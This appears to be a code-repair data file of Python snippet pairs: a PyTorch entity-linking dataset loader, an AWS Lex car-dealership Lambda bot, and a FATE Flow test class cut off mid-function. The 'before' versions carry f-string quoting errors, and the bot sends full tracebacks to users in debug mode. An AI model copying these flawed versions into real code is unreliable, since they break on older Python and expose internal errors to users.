print('{} instances loaded in {:.2f} seconds'.format(len(self.instances), time.time() - t0))
print('pos vs. neg = 1 vs. {:.2f}'.format((len(self.instances) - pos_labels)/pos_labels))
np.random.shuffle(self.instances)
| import numpy as np
import time
import json
import utils
import torch
from torch.utils.data import Dataset
np.random.seed(0)
DATA_PATH = './data/'
class ToutiaoEntityLinkingDataset(Dataset):
def __init__(self, set_type, opt, char_dict, ent_dict,
is_inference=False, is_pretrain=False):
super().__init__()
self.set_type = set_type
self.domain = opt.domain
self.is_inference = is_inference
self.is_pretrain = is_pretrain
self.instances = []
self.num_comments = []
self.num_mentions = 0
self.char_dict = char_dict
self.ent_dict = ent_dict
self.load_raw_dataset()
def __len__(self):
return len(self.instances)
def __getitem__(self, index):
instance = self.instances[index]
ret_obj = dict(
cmt_text=instance[0],
cand_text=instance[3],
cmt_ids=instance[1],
ment_ind=instance[2],
cand_ent=instance[4],
features=instance[5],
art_ref_ent=instance[6],
label=instance[7],
id=instance[8],
mention_tuple=instance[9],
)
return ret_obj
def collater(self, samples):
"""Convert a list of instances into a batch, do padding for comment"""
def merge(key, is_list=False, pad_idx=0):
if is_list:
res = []
for i in range(len(samples[0][key])):
res.append(utils.collate_tokens(
[s[key][i] for s in samples], pad_idx=pad_idx,
))
return res
else:
return utils.collate_tokens([s[key] for s in samples],
pad_idx=pad_idx)
ret_obj = dict(
id=[s['id'] for s in samples],
comment=merge('cmt_ids', pad_idx=0),
mention_ind=merge('ment_ind', pad_idx=0),
features=merge('features'),
cand_ent=torch.LongTensor([s['cand_ent'] for s in samples]),
art_ref_ent=merge('art_ref_ent'),
labels=torch.FloatTensor([int(s['label']) for s in samples]),
comment_text=[s['cmt_text'] for s in samples],
cand_text=[s['cand_text'] for s in samples],
mention_tuple=[s['mention_tuple'] for s in samples],
)
return ret_obj
def load_raw_dataset(self):
t0 = time.time()
pos_labels = 0
jsonl_path = DATA_PATH + f'{self.domain}_'
if self.is_pretrain:
jsonl_path += 'unlabeled.jsonl'
else:
jsonl_path += 'labeled.jsonl'
art_ref_entity_path = DATA_PATH + f'{self.domain}_art_ref_entity.jsonl'
art_ref_entity = [json.loads(ln) for ln in open(art_ref_entity_path)]
features_path = DATA_PATH + f'features/{self.domain}_labeled.jsonl'
features = [json.loads(ln) for ln in open(features_path)]
for ln_id, ln in enumerate(open(jsonl_path)):
cur_feat = features[ln_id]['comments']
cur_obj = json.loads(ln)
if cur_obj['split'] != self.set_type: continue
self.num_comments.append(len(cur_obj['comments']))
cur_art_ref_entity_ids = [self.ent_dict.word2id(e) for e in art_ref_entity[ln_id]]
for cid, cmt in enumerate(cur_obj['comments']):
cmt_text = cmt['text']
cmt_char_ids = [self.char_dict.word2id(w) for w in cmt['text']]
assert cur_feat[cid]['comment'] == cmt_text
self.num_mentions += len(cmt['mentions'])
for ment_ix, ment in enumerate(cmt['mentions']):
ment_ind = np.zeros([len(cmt_text)], dtype=np.int)
ment_ind[ment['span'][0]: ment['span'][1]] = 1
ment_feat = cur_feat[cid]['features'][ment_ix]
for cand_ix, cand in enumerate(ment['candidates']):
if not cand in ment_feat: continue
cand_id = self.ent_dict.word2id(cand)
instance_feats = ment_feat[cand]
# comment_text, comment_char_ids, mention indicator, candidate_text, candidate_id, features, article_ent, label, id
label = cand in ment['labels']
if label:
pos_labels += 1
instance_id = f'{cur_obj["id"]}_{cmt["cid"]}_{ment_ix}_{cand_ix}'
cmt_char_ids = torch.LongTensor(cmt_char_ids)
ment_ind = torch.LongTensor(ment_ind)
instance_feats = torch.Tensor(instance_feats)
art_ref_ent = torch.LongTensor(cur_art_ref_entity_ids)
cur_instance = (cmt_text, cmt_char_ids, ment_ind, cand,
cand_id, instance_feats, art_ref_ent, label,
instance_id, (ment['text'], ment['span']))
self.instances.append(cur_instance)
print('{} instances loaded in {:.2f} seconds'.format(len(self.instances), time.time() - t0))
print('pos vs. neg = 1 vs. {:.2f}'.format((len(self.instances) - pos_labels)/pos_labels))
np.random.shuffle(self.instances)
|
import json
import random
import decimal
import os
import logging
import traceback
debug=True
# on error, return nice message to bot
def fail(intent_request,error):
#don't share the full eerror in production code, it's not good to give full traceback data to users
error = error if debug else ''
intent_name = intent_request['sessionState']['intent']['name']
message = {
'contentType': 'PlainText',
'content': f"Oops... I guess I ran into an error I wasn't expecting... Sorry about that. My dev should probably look in the logs.\n {error}"
}
fulfillment_state = "Fulfilled"
return close(intent_request, get_session_attributes(intent_request), fulfillment_state, message)
#mock data query against inventory.json instead of a database or using an api call
def query_data(make,vehicle_type):
inventory_path = os.environ['LAMBDA_TASK_ROOT'] + "/inventory.json"
content=open(inventory_path).read()
inventory_json=json.loads(content)
filtered= [v for v in inventory_json if make==v['make'] and vehicle_type==v['type']]
return filtered
'''''
=== UTIL METHODS ===========================
'''''
#util method to get the slots fromt he request
def get_slots(intent_request):
return intent_request['sessionState']['intent']['slots']
#util method to get a slot's value
def get_slot(intent_request, slotName):
slots = get_slots(intent_request)
if slots is not None and slotName in slots and slots[slotName] is not None and 'interpretedValue' in slots[slotName]['value']:
return slots[slotName]['value']['interpretedValue']
else:
return None
#gets a map of the session attributes
def get_session_attributes(intent_request):
sessionState = intent_request['sessionState']
if 'sessionAttributes' in sessionState:
return sessionState['sessionAttributes']
return {}
# builds response to tell the bot you want to trigger another intent (use to switch the context)
def elicit_intent(intent_request, session_attributes, message):
return {
'sessionState': {
'dialogAction': {
'type': 'ElicitIntent'
},
'sessionAttributes': session_attributes
},
'messages': [ message ] if message != None else None,
'requestAttributes': intent_request['requestAttributes'] if 'requestAttributes' in intent_request else None
}
# builds response to tell the bot you need to get the value of a particular slot
def elicit_slot(intent_request, session_attributes,slot_to_elicit, message):
intent_request['sessionState']['intent']['state'] = 'InProgress'
return {
'sessionState': {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'ElicitSlot',
'slotToElicit': slot_to_elicit
},
'intent': intent_request['sessionState']['intent']
},
'messages': [message],
'sessionId': intent_request['sessionId'],
'requestAttributes': intent_request['requestAttributes'] if 'requestAttributes' in intent_request else None
}
# builds response to end the dialog
def close(intent_request, session_attributes, fulfillment_state, message):
intent_request['sessionState']['intent']['state'] = fulfillment_state
return {
'sessionState': {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Close'
},
'intent': intent_request['sessionState']['intent']
},
'messages': [message],
'sessionId': intent_request['sessionId'],
'requestAttributes': intent_request['requestAttributes'] if 'requestAttributes' in intent_request else None
}
'''
==== intent handlers =====
'''
# process the VehicleInventorySearch intent
def process_find_car(intent_request):
session_attributes = get_session_attributes(intent_request)
slots = get_slots(intent_request)
#get slot values
make=get_slot(intent_request,'make')
vehicle_type=get_slot(intent_request,'vehicleType')
color=slots['color']['value']['interpretedValue'] if slots['color'] else ''
#look up data
results=query_data(make,vehicle_type)
# process resulsts
if(len(results)==1):
print(results)
found=results[0]
text = f" we have {found["inventory"]} {found["color"]} {found["year"]} {found["make"]} {found["model"]} in stock. It would cost {found["price"]}"
elif(len(results)>1): #multiple results, check if we can match color as well
color_match=[v for v in results if v['color'].lower()==color.lower()]
found=color_match[0] if len(color_match)>0 else results[0]
text = f" we have {found["inventory"]} {found["color"]} {found["year"]} {found["make"]} {found["model"]} in stock. It would cost {found["price"]}"
else: #nothing found
text= f"no {make} {vehicle_type}s are currently available in our inventory"
message = {
'contentType': 'PlainText',
'content': text
}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
#handle the BookTestDrive intent.
#this shows an example of using session_attributes to save information over multiple interactions
def process_book_test_drive(intent_request):
session_attributes = get_session_attributes(intent_request)
slots = get_slots(intent_request)
# check if we already set the session data
if 'selectedVehicle' not in session_attributes:
make=get_slot(intent_request,'make')
vehicle_type=get_slot(intent_request,'vehicleType')
if make and vehicle_type: #if the make and vehicle type is set in the slots query the data
results = query_data(make,vehicle_type)
if len(results)>0:
v=results[0] #pick the first vehicle match
# set the display value of the selected vehicle
session_attributes['selectedVehicle']=f"{v["year"]} {v["make"]} {v["model"]}"
else: #no match, no car to test drive
message= {'contentType': 'PlainText','content': f"Sorry, we don't have any {make} {vehicle_type}s on the dealership lot right now"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
date=get_slot(intent_request,'date')
time=get_slot(intent_request,'time')
if date and time and 'selectedVehicle' in session_attributes:
vehicle_str = session_attributes['selectedVehicle']
# all data available fulfill
message= {'contentType': 'PlainText','content': f"Your test drive for the {vehicle_str} is scheduled for {date} at {time}"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
elif 'selectedVehicle' in session_attributes:
vehicle=session_attributes['selectedVehicle']
# still need data delegate to the bot
if date is None:
message= {'contentType': 'PlainText','content': f'What day do you want to come in and drive a {vehicle}?'}
return elicit_slot(intent_request,session_attributes,'date',message)
elif time is None:
message= {'contentType': 'PlainText','content': f'What time do you want to come and test drive a {vehicle}?'}
return elicit_slot(intent_request,session_attributes,'time',message)
else:
message= {'contentType': 'PlainText','content': "It shouldn't be possible to reach here... I guess I have a bug"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
else:
if make is None:
message= {'contentType': 'PlainText','content': 'What automaker are you interested in?'}
return elicit_slot(intent_request,session_attributes,'make',message)
elif vehicle_type is None:
message= {'contentType': 'PlainText','content': 'Do you want to drive a car, a truck, or an suv?'}
return elicit_slot(intent_request,session_attributes,'vehicleType',message)
else:
message= {'contentType': 'PlainText','content': "It shouldn't be possible to reach here... I guess I have a bug"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
# handles the hello intent
def process_hello(intent_request):
session_attributes = get_session_attributes(intent_request)
slots = get_slots(intent_request)
message = {
'contentType': 'PlainText',
'content': 'hello from the lambda'
}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
#handler for when there is no matching intent handler
def default_response(intent_request):
session_attributes = get_session_attributes(intent_request)
intent_name = intent_request['sessionState']['intent']['name']
message = {
'contentType': 'PlainText',
'content': f"This lambda doesn't know how to process intent_name={intent_name}"
}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
#looks at the intent_name and routes to the handler method
def dispatch(intent_request):
try:
intent_name = intent_request['sessionState']['intent']['name']
response = None
# Dispatch to your bot's intent handlers
if intent_name == 'Hello':
return process_hello(intent_request)
elif intent_name == 'VehicleInventorySearch':
return process_find_car(intent_request)
elif intent_name == 'BookTestDrive':
return process_book_test_drive(intent_request)
else:
return default_response(intent_request)
except Exception as ex:
error = traceback.format_exc()
print(error)
return fail(intent_request,error)
#entry point of lambda
def lambda_handler(event, context):
print(json.dumps(event))
response = dispatch(event)
return response
| import json
import random
import decimal
import os
import logging
import traceback
debug=True
# on error, return nice message to bot
def fail(intent_request,error):
#don't share the full eerror in production code, it's not good to give full traceback data to users
error = error if debug else ''
intent_name = intent_request['sessionState']['intent']['name']
message = {
'contentType': 'PlainText',
'content': f"Oops... I guess I ran into an error I wasn't expecting... Sorry about that. My dev should probably look in the logs.\n {error}"
}
fulfillment_state = "Fulfilled"
return close(intent_request, get_session_attributes(intent_request), fulfillment_state, message)
#mock data query against inventory.json instead of a database or using an api call
def query_data(make,vehicle_type):
inventory_path = os.environ['LAMBDA_TASK_ROOT'] + "/inventory.json"
content=open(inventory_path).read()
inventory_json=json.loads(content)
filtered= [v for v in inventory_json if make==v['make'] and vehicle_type==v['type']]
return filtered
'''''
=== UTIL METHODS ===========================
'''''
#util method to get the slots fromt he request
def get_slots(intent_request):
return intent_request['sessionState']['intent']['slots']
#util method to get a slot's value
def get_slot(intent_request, slotName):
slots = get_slots(intent_request)
if slots is not None and slotName in slots and slots[slotName] is not None and 'interpretedValue' in slots[slotName]['value']:
return slots[slotName]['value']['interpretedValue']
else:
return None
#gets a map of the session attributes
def get_session_attributes(intent_request):
sessionState = intent_request['sessionState']
if 'sessionAttributes' in sessionState:
return sessionState['sessionAttributes']
return {}
# builds response to tell the bot you want to trigger another intent (use to switch the context)
def elicit_intent(intent_request, session_attributes, message):
return {
'sessionState': {
'dialogAction': {
'type': 'ElicitIntent'
},
'sessionAttributes': session_attributes
},
'messages': [ message ] if message != None else None,
'requestAttributes': intent_request['requestAttributes'] if 'requestAttributes' in intent_request else None
}
# builds response to tell the bot you need to get the value of a particular slot
def elicit_slot(intent_request, session_attributes,slot_to_elicit, message):
intent_request['sessionState']['intent']['state'] = 'InProgress'
return {
'sessionState': {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'ElicitSlot',
'slotToElicit': slot_to_elicit
},
'intent': intent_request['sessionState']['intent']
},
'messages': [message],
'sessionId': intent_request['sessionId'],
'requestAttributes': intent_request['requestAttributes'] if 'requestAttributes' in intent_request else None
}
# builds response to end the dialog
def close(intent_request, session_attributes, fulfillment_state, message):
intent_request['sessionState']['intent']['state'] = fulfillment_state
return {
'sessionState': {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Close'
},
'intent': intent_request['sessionState']['intent']
},
'messages': [message],
'sessionId': intent_request['sessionId'],
'requestAttributes': intent_request['requestAttributes'] if 'requestAttributes' in intent_request else None
}
'''
==== intent handlers =====
'''
# process the VehicleInventorySearch intent
def process_find_car(intent_request):
session_attributes = get_session_attributes(intent_request)
slots = get_slots(intent_request)
#get slot values
make=get_slot(intent_request,'make')
vehicle_type=get_slot(intent_request,'vehicleType')
color=slots['color']['value']['interpretedValue'] if slots['color'] else ''
#look up data
results=query_data(make,vehicle_type)
# process resulsts
if(len(results)==1):
print(results)
found=results[0]
text = f" we have {found['inventory']} {found['color']} {found['year']} {found['make']} {found['model']} in stock. It would cost {found['price']}"
elif(len(results)>1): #multiple results, check if we can match color as well
color_match=[v for v in results if v['color'].lower()==color.lower()]
found=color_match[0] if len(color_match)>0 else results[0]
text = f" we have {found['inventory']} {found['color']} {found['year']} {found['make']} {found['model']} in stock. It would cost {found['price']}"
else: #nothing found
text= f"no {make} {vehicle_type}s are currently available in our inventory"
message = {
'contentType': 'PlainText',
'content': text
}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
#handle the BookTestDrive intent.
#this shows an example of using session_attributes to save information over multiple interactions
def process_book_test_drive(intent_request):
session_attributes = get_session_attributes(intent_request)
slots = get_slots(intent_request)
# check if we already set the session data
if 'selectedVehicle' not in session_attributes:
make=get_slot(intent_request,'make')
vehicle_type=get_slot(intent_request,'vehicleType')
if make and vehicle_type: #if the make and vehicle type is set in the slots query the data
results = query_data(make,vehicle_type)
if len(results)>0:
v=results[0] #pick the first vehicle match
# set the display value of the selected vehicle
session_attributes['selectedVehicle']=f"{v['year']} {v['make']} {v['model']}"
else: #no match, no car to test drive
message= {'contentType': 'PlainText','content': f"Sorry, we don't have any {make} {vehicle_type}s on the dealership lot right now"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
date=get_slot(intent_request,'date')
time=get_slot(intent_request,'time')
if date and time and 'selectedVehicle' in session_attributes:
vehicle_str = session_attributes['selectedVehicle']
# all data available fulfill
message= {'contentType': 'PlainText','content': f"Your test drive for the {vehicle_str} is scheduled for {date} at {time}"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
elif 'selectedVehicle' in session_attributes:
vehicle=session_attributes['selectedVehicle']
# still need data delegate to the bot
if date is None:
message= {'contentType': 'PlainText','content': f'What day do you want to come in and drive a {vehicle}?'}
return elicit_slot(intent_request,session_attributes,'date',message)
elif time is None:
message= {'contentType': 'PlainText','content': f'What time do you want to come and test drive a {vehicle}?'}
return elicit_slot(intent_request,session_attributes,'time',message)
else:
message= {'contentType': 'PlainText','content': "It shouldn't be possible to reach here... I guess I have a bug"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
else:
if make is None:
message= {'contentType': 'PlainText','content': 'What automaker are you interested in?'}
return elicit_slot(intent_request,session_attributes,'make',message)
elif vehicle_type is None:
message= {'contentType': 'PlainText','content': 'Do you want to drive a car, a truck, or an suv?'}
return elicit_slot(intent_request,session_attributes,'vehicleType',message)
else:
message= {'contentType': 'PlainText','content': "It shouldn't be possible to reach here... I guess I have a bug"}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
# handles the hello intent
def process_hello(intent_request):
session_attributes = get_session_attributes(intent_request)
slots = get_slots(intent_request)
message = {
'contentType': 'PlainText',
'content': 'hello from the lambda'
}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
#handler for when there is no matching intent handler
def default_response(intent_request):
session_attributes = get_session_attributes(intent_request)
intent_name = intent_request['sessionState']['intent']['name']
message = {
'contentType': 'PlainText',
'content': f"This lambda doesn't know how to process intent_name={intent_name}"
}
fulfillment_state = "Fulfilled"
return close(intent_request, session_attributes, fulfillment_state, message)
#looks at the intent_name and routes to the handler method
def dispatch(intent_request):
try:
intent_name = intent_request['sessionState']['intent']['name']
response = None
# Dispatch to your bot's intent handlers
if intent_name == 'Hello':
return process_hello(intent_request)
elif intent_name == 'VehicleInventorySearch':
return process_find_car(intent_request)
elif intent_name == 'BookTestDrive':
return process_book_test_drive(intent_request)
else:
return default_response(intent_request)
except Exception as ex:
error = traceback.format_exc()
print(error)
return fail(intent_request,error)
#entry point of lambda
def lambda_handler(event, context):
print(json.dumps(event))
response = dispatch(event)
return response
|
import json
import os
import sys
import shutil
import time
import subprocess
import numpy as np
from pathlib import Path
from prettytable import PrettyTable, ORGMODE
from fate_test.flow_test.flow_process import get_dict_from_file, serving_connect
class TestModel(object):
def __init__(self, data_base_dir, fate_flow_path, component_name, namespace):
self.conf_path = None
self.dsl_path = None
self.job_id = None
self.model_id = None
self.model_version = None
self.guest_party_id = None
self.host_party_id = None
self.arbiter_party_id = None
self.output_path = None
self.cache_directory = None
self.data_base_dir = data_base_dir
self.fate_flow_path = fate_flow_path
self.component_name = component_name
self.python_bin = sys.executable or 'python3'
self.request_api_info_path = f'./logs/{namespace}/cli_exception.log'
os.makedirs(os.path.dirname(self.request_api_info_path), exist_ok=True)
def error_log(self, retmsg):
if retmsg is None:
return os.path.abspath(self.request_api_info_path)
with open(self.request_api_info_path, "a") as f:
f.write(retmsg)
def submit_job(self, stop=True):
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "submit_job", "-d", self.dsl_path,
"-c", self.conf_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job submit: {}'.format(stdout.get('retmsg')) + '\n')
self.job_id = stdout.get("jobId")
self.model_id = stdout.get("data").get("model_info").get("model_id")
self.model_version = stdout.get("data").get("model_info").get("model_version")
if stop:
return
return self.query_status()
except Exception:
return
def job_api(self, command):
if command == 'stop_job':
self.submit_job()
time.sleep(5)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job stop: {}'.format(stdout.get('retmsg')) + '\n')
if self.query_job() == "canceled":
return stdout.get('retcode')
except Exception:
return
elif command == 'job_log':
log_file_dir = os.path.join(self.output_path, 'job_{}_log'.format(self.job_id))
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id, "-o",
log_file_dir], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job log: {}'.format(stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
except Exception:
return
elif command == 'data_view_query':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('data view queue: {}'.format(stdout.get('retmsg')) + '\n')
if len(stdout.get("data")) == len(list(get_dict_from_file(self.dsl_path)['components'].keys())) - 1:
return stdout.get('retcode')
except Exception:
return
elif command == 'clean_job':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('clean job: {}'.format(stdout.get('retmsg')) + '\n')
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "component_metrics", "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
metric, stderr = subp.communicate()
metric = json.loads(metric.decode("utf-8"))
if not metric.get('data'):
return stdout.get('retcode')
except Exception:
return
elif command == 'clean_queue':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('clean queue: {}'.format(stdout.get('retmsg')) + '\n')
if not self.query_job(queue=True):
return stdout.get('retcode')
except Exception:
return
def query_job(self, job_id=None, queue=False):
if job_id is None:
job_id = self.job_id
time.sleep(1)
try:
if not queue:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "query_job", "-j", job_id],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if not stdout.get('retcode'):
return stdout.get("data")[0].get("f_status")
else:
self.error_log('query job: {}'.format(stdout.get('retmsg')) + '\n')
else:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "query_job", "-j", job_id, "-s",
"waiting"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if not stdout.get('retcode'):
return len(stdout.get("data"))
except Exception:
return
def job_config(self, max_iter):
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "job_config", "-j", self.job_id, "-r",
"guest", "-p", str(self.guest_party_id[0]), "-o", self.output_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job config: {}'.format(stdout.get('retmsg')) + '\n')
job_conf_path = stdout.get('directory') + '/runtime_conf.json'
job_conf = get_dict_from_file(job_conf_path)
if max_iter == job_conf['component_parameters']['common'][self.component_name]['max_iter']:
return stdout.get('retcode')
except Exception:
return
def query_task(self):
try:
subp = subprocess.Popen(
[self.python_bin, self.fate_flow_path, "-f", "query_task", "-j", self.job_id, "-r", "guest",
"-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('task query: {}'.format(stdout.get('retmsg')) + '\n')
status = stdout.get("data")[0].get("f_status")
if status == "success":
return stdout.get('retcode')
except Exception:
return
def component_api(self, command, max_iter=None):
component_output_path = os.path.join(self.output_path, 'job_{}_output_data'.format(self.job_id))
if command == 'component_output_data':
try:
subp = subprocess.Popen(
[self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id, "-r",
"guest", "-p", str(self.guest_party_id[0]), "-cpn", self.component_name, "-o",
component_output_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component output data: {}'.format(stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
except Exception:
return
elif command == 'component_output_data_table':
try:
subp = subprocess.Popen(
[self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id, "-r",
"guest", "-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component output data table: {}'.format(stdout.get('retmsg')) + '\n')
table = {'table_name': stdout.get("data")[0].get("table_name"),
'namespace': stdout.get("data")[0].get("namespace")}
if not self.table_api('table_info', table):
return stdout.get('retcode')
except Exception:
return
elif command == 'component_output_model':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-r", "guest",
"-j", self.job_id, "-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component output model: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get("data"):
return stdout.get('retcode')
except Exception:
return
elif command == 'component_parameters':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component parameters: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get('data', {}).get('ComponentParam', {}).get('max_iter', {}) == max_iter:
return stdout.get('retcode')
except Exception:
return
elif command == 'component_metrics':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component metrics: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get("data"):
metrics_file = self.output_path + '{}_metrics.json'.format(self.job_id)
with open(metrics_file, 'w') as fp:
json.dump(stdout.get("data"), fp)
return stdout.get('retcode')
except Exception:
return
elif command == 'component_metric_all':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component metric all: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get("data"):
metric_all_file = self.output_path + '{}_metric_all.json'.format(self.job_id)
with open(metric_all_file, 'w') as fp:
json.dump(stdout.get("data"), fp)
return stdout.get('retcode')
except Exception:
return
elif command == 'component_metric_delete':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j",
self.job_id, "-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn",
'evaluation_0'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component metric delete: {}'.format(stdout.get('retmsg')) + '\n')
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "component_metrics", "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
metric, stderr = subp.communicate()
metric = json.loads(metric.decode("utf-8"))
if not metric.get('data'):
return stdout.get('retcode')
except Exception:
return
def table_api(self, command, table_name):
if command == 'table_info':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-t",
table_name['table_name'], "-n", table_name['namespace']],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('table info: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get('data')['namespace'] == table_name['namespace'] and \
stdout.get('data')['table_name'] == table_name['table_name']:
return stdout.get('retcode')
except Exception:
return
elif command == 'table_delete':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-t",
table_name['table_name'], "-n", table_name['namespace']],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('table delete: {}'.format(stdout.get('retmsg')) + '\n')
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "table_delete", "-t",
table_name['table_name'], "-n", table_name['namespace']],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
return 0
except Exception:
return
def data_upload(self, upload_path, table_index=None):
upload_file = get_dict_from_file(upload_path)
upload_file['file'] = str(self.data_base_dir.joinpath(upload_file['file']).resolve())
upload_file['drop'] = 1
upload_file['use_local_data'] = 0
if table_index is not None:
upload_file['table_name'] = f'{upload_file['file']}_{table_index}'
upload_path = self.cache_directory + 'upload_file.json'
with open(upload_path, 'w') as fp:
json.dump(upload_file, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "upload", "-c", upload_path, "-drop", "1"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
